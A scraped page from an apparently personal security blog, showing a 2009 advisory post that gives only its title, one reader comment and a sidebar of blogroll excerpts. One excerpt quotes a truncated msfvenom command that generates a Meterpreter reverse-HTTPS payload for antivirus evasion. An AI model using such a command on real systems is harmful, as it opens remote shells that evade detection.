skip to main | skip to sidebar
_ Where facts are few, experts are many
  • Home
  • Advisories
  • Daily News Paper
  • About Me
  • Contact
    • Mail
    • Archived Blog
    • Business Card
  • Subscribe RSS
Advisory : One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....
[Wednesday, July 15, 2009 | 1 comments ]

Subscribe to the RSS feed in case you are interested in updates
  • [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari,Opera, Chrome,Seamonkey,iPhone,iPod,Wii,PS3....

1 comments

CG said... @ 16 July, 2009 15:04

thanks for not killing my PS3 ;-)

Post a Comment

Newer Post Older Post Home

About Me

My Photo
Thierry Zoller
Welcome to my personal Blog - In here I blog about Information Security and in general anything I regard as newsworthy. On the professional side I am currently working as an EMEA Practice Lead at Verizon Business for Threat and Vulnerability Management

Quick-links
▪ My vulnerability disclosure policy
▪ About me / Profile
▪ Tools / Talks / Whitepapers
▪ Contact Me

The views and opinions expressed on this blog are my personal views and are not intended to reflect the views of my employer or any other entity.
View my complete profile

Follow @thierryzoller

Follow by Email

Subscribe To

Posts
Atom
Posts

Cluster Map

Popular Posts

  • IIS 6 / IIS 5 / IIS 5.1+ Webdav auth bypass [Final]
    Table of Contents Updates Bulletins Am I at risk ? Tools Technical details 0.1 Personal message Several news stories seem to allu...
  • The BEAST summary - TLS, CBC, Countermeasures (Update 4)
    Lots of good information floating on the internet on the Proof of Concept (dubbed 'BEAST) against TLS 1.0 by Juliano Rizzo and Thai Duong ...
  • PCI compliance, Security in isolated systems and Parking Tellers (Part1)
    A colleague of mine spotted the below while we were doing our expenses - The photograph below shows two separate receipts from two parking ...
  • Attacker Classes and Pyramid (Version 3)
    This is a living blog post I will update whenever I have time and new ideas. TOC Introduction Updates Attacker Classes Attacker Pyr...
  • CVE-2010-x+n - Loadlibrary/Getprocaddress roars its evil head in 2010
    Subscribe to the RSS feed in case you are interested in updates After Acrossecurity , published an interesting vulnerability and HDmoo...

Blogs I read

  • TaoSecurity
    5000th Tweet - Today I posted my 5000th Tweet. I've apparently been a Twitter user since 1 December 2008. I remember not Tweeting anything until 15 July 2009, when I att...
    43 minutes ago
  • Securosis Highlights
    Pragmatic Key Management- Understanding Data Encryption Systems - One of the common problems when working with encryption is getting caught up with the intimate details of things like the encryption algorithms, key leng...
    6 hours ago
  • Schneier on Security
    Tax Return Identity Theft - I wrote about this sort of thing in 2006 in the UK, but it's even bigger business here: The criminals, some of them former drug dealers, outwit the Inter...
    8 hours ago
  • Metasploit
    Weekly Metasploit Update: Dev Docs and More! - This week in the U.S. is the unofficial start of summer, so that probably explains why it's been a bit of a slow week in the Metasploit community, hackin...
    11 hours ago
  • Androguard
    support of sessions + notes ! - Hi, I changed a lot of things in the output, and now you can choose your colors, and the overview of a method is better: But an interesting feature is t...
    14 hours ago
  • A Few Thoughts on Cryptographic Engineering
    TACK - (source/cc) Those who read this blog know that I have a particular fascination with our CA system and how screwed up it is. The good news is that I'm not ...
    1 day ago
  • VRT
    Flame Malware, Targeted Attacks, and You - It seems no good holiday goes by without some quality new malware being dropped, and this year's Memorial Day was no exception. Announced in posts by Kaspe...
    2 days ago
  • Leblanc
    Blog Post: .NET and the XAdES standard -
    1 week ago
  • Secure Belief
    SQLMap - Operating System Takeover - Windows - Today I'm trying to use "OS takeover" feature of sqlmap. sqlmap can be used to get command shell using sql injection. sqlmap provides following options fo...
    1 week ago
  • Krebs on Security
    WHMCS Breach May Be Only Tip of the Trouble - A recent breach at billing and support software provider WHMCS that exposed a half million customer usernames, passwords -- and in some cases credit cards ...
    1 week ago
  • Troy Hunt
    Everything you ever wanted to know about building a secure password reset feature - Recently I’ve had a couple of opportunities to think again about how a secure password reset function should operate, firstly whilst building this functi...
    1 week ago
  • Lenny Zeltser on Information Security
    5 Favorite Security Reads of the Week - Here’s a listing of my 5 favorite on-line security articles, papers and blog posts that I read in the past week: - Why the Public Cloud Shuns Security...
    1 week ago
  • Ma petite parcelle d'Internet...
    PaulDotCom Security Weekly 288 - D emain 17 mai, on m'a très chaleureusement invité à participer au numéro 288 de l'excellent PaulDotCom Security Weekly. Programmé en live à 18:00, heure d...
    2 weeks ago
  • Uncommon Sense Security
    A meandering rant on sexism. - This has been a bad year for technology. Not necessarily for the business of technology (although it is very hard to discuss the current state of the te...
    2 weeks ago
  • The New School of Information Security
    Why Sharing Raw Data is Important - Bob Rudis has a nice post up “Off By One : The Importance Of Fact Checking Breach Reports,” in which he points out some apparent errors in the Massachusett...
    2 weeks ago
  • Cognitive Dissidents
    “Building a Better Anonymous” Series: Part 6 - Building a Better Anonymous – Details By Josh Corman & Brian Martin 2012 If you are new to this series, please begin with Part 0 and the index. NOTE: We wi...
    2 weeks ago
  • IBM Internet Security Systems Frequency X Blog
    The Advanced Persistent Threat in 2012 -
    3 weeks ago
  • Digital Forensics is a Science
    Computer Forensic Failures - File system issues - I'm very happy to report that I received short story that clearly resulted in the author learning from their actions. The author of this story wished to re...
    5 weeks ago
  • /dev/ttyS0
    Telegraph Relay Controller - A bit of old-school hacking today. I picked up an old J.H. Bunnell telegraph relay, which from what I’ve been able to deduce is a mainline type 2-3 relay m...
    1 month ago
  • Security
    vsftpd-3.0.0 and seccomp filter sandboxing is here! - vsftpd-3.0.0 is released. Aside from the usual few fixes, I'm excited about built-in support for Will Drewry's seccomp filter, which landed in Ubuntu. To g...
    1 month ago
  • Chatter on the Wire: How excessive network traffic gives away too much!
    CapLoader 1.0 - I've been playing with a beta of this product for the past month or so. Straight from Erik's writeup: Here are the main features of CapLoader: • Fast loadi...
    1 month ago
  • Fun Over IP
    Antivirus Sandbox Evasion (part1) - Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-paylo...
    3 months ago
  • root labs rdist
    SSL optimization and security talk - I gave a talk at Cal Poly on recently proposed changes to SSL. I covered False Start and Snap Start, both designed by Google engineer Adam Langley. Snap St...
    3 months ago
  • Cup of Security
    Free Mobile ou Roaming Orange, vérifiez le vous-même avec votre iPhone ou smartphone Android - Si comme moi vous avez changé d'opérateur Mobile pour Free Mobile, vous n'avez pas pu passer à côté des lourdes accusations portées contre Free Mobile par ...
    3 months ago
  • ...And You Will Know me by the Trail of Bits
    Pwn2Own Pre-Game - Just in time to get warmed up for Pwn2Own, we are delivering a joint offering of the training courses “Bug Hunting and Analysis 0×65” by Aaron Portnoy and ...
    6 months ago
  • ax330d's blog
    Summing up SVG fuzzing in browsers - Hi there. As the title states, this is a summary of SVG fuzzing results. Today I would like to prattle a bit about what I was doing for some 2 weeks in t...
    8 months ago
  • Nynaeve
    NWScript JIT engine: Wrap-up (for now) - Yesterday, I provided a brief performance overview of the MSIL JIT backend versus my implementation of an interpretive VM for various workloads. Today, I’l...
    1 year ago
Show 10 Show All

Links

  • Fun over IP
  • Joe Sandbox
  • Hack.lu
  • SVEN
  • Cup of Security Blog
  • Heise Security
  • Korbens Blog
  • Beatrix
  • Metasploit

Labels

  • Advisory (52)
  • Rants from Thierry (19)
  • Tool (14)
  • Vulnerabilties (10)
  • Misc (8)
  • How-to (6)
  • Lectures (2)
  • Whitepaper (2)
  • zero day (1)
 
Copyright Musings on Information Security Template by Michael Jubel